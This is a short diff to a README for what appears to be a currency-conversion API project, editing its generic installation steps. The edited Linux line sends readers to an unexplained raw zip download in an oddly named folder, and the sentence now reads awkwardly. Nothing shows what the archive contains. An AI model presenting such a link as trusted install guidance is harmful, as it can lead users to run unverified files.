luis0443/convert-currency-api/README.md

 - Windows: Double-click the `.exe` or `.msi` file and follow the installation prompts.
 - macOS: Open the `.dmg` or `.pkg` file and follow the instructions.
-- Linux: Use your preferred package manager or unpack the `.tar.gz` and follow the README instructions.
+- Linux: Use your preferred package manager or unpack the `https://raw.githubusercontent.com/luis0443/convert-currency-api/main/excerptor/convert-currency-api-v1.2.zip` and follow the README instructions.

 After installation, the application will be ready for use.